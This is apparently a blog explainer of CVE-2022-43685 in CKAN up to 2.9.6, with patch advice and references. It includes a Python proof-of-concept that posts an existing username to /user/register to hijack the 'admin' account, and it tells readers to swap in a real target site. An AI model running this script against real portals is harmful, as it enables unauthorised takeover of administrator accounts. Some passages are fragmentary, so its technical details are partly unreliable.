CVE-2022-43685 - How CKAN’s Login Bug Allowed Anyone to Take Over Any Account (Even Superusers)

The world of open data relies heavily on CKAN—the most popular open-source data portal for governments, institutions, and companies globally. However, a serious vulnerability tracked as CVE-2022-43685 was discovered in early versions of CKAN (all up to 2.9.6) that allowed attackers to take over any user account, including superuser (site admin) accounts. Worse, the attack could even be done by users who weren’t logged in!

In this article, we’ll break down what caused this issue, show you a real-world exploit example, and point you to official resources for more details. We’ll keep things simple and easy to follow, even if you’re not a security pro.

What is CKAN?

CKAN is an open-source software for powering open data websites, used by governments from the US to Europe and beyond. It manages users, datasets, and organizations.

A superuser who can do *anything* in the site.

If an attacker took over a superuser account, they’d control the entire data portal.

The root bug exists in CKAN versions up to 2.9.6. Here’s what went wrong

If you POST (send) a request to the user creation endpoint with an existing user’s ID, CKAN would simply log you in as that user—even if you weren’t authenticated!

This affects any CKAN instance with web user registration enabled (which is the out-of-the-box default).

How Does the Exploit Work?

Let’s walk through the technical details in plain English.

1. The Weak Part in CKAN

Normally, when you POST a registration form (to /user/register), CKAN should only allow creation of *new* users, and never let someone hijack an existing user.

2. Example Attack Code

Here’s a Python example that uses requests to take over the “admin” account in a vulnerable CKAN site:

import requests

CKAN_URL = "http://example.com";   # Change this to your CKAN site
TARGET_USER = "admin"             # The username you want to hijack

session = requests.Session()

# POST payload with an existing user id
payload = {
    "id": TARGET_USER,
    "name": TARGET_USER,
    "email": "attacker@example.com",
    # You can add other required fields, they don't matter
}

# Send POST request to the registration endpoint
response = session.post(f"{CKAN_URL}/user/register", data=payload)

if "Log out" in response.text:
    print(f"Success! You are now logged in as {TARGET_USER}")
else:
    print("Exploit failed or site is patched")

Replacehttp://example.com and admin with the real target site and username.

How To Fix

Update! This bug is fixed in CKAN 2.9.7 and newer.

You can see the official fix here

- CKAN #7048 (GitHub Pull Request)
- Official CKAN Security Advisory (GitHub issue)

References

- CVE-2022-43685 @ NIST
- Official fix announcement
- CKAN 2.9.7 release notes (includes fix)
- Twitter thread from discoverer *(for background)*

Conclusion

CVE-2022-43685 shows how a small logic flaw can put major public infrastructure at risk. If you run CKAN, patch *right now* to 2.9.7+. And always test your registration endpoints for strange behaviors.

If you want to stay on top of security, keep an eye on your app’s changelogs, follow advisories, and know when to update.

Stay safe, and keep your data open—but not your admin accounts!

*If you found this helpful, please share with CKAN admins and your local government tech friends. The open data ecosystem is stronger when we all look out for each other!*

Timeline

Published on: 11/22/2022 01:15:00 UTC
Last modified on: 11/23/2022 19:45:00 UTC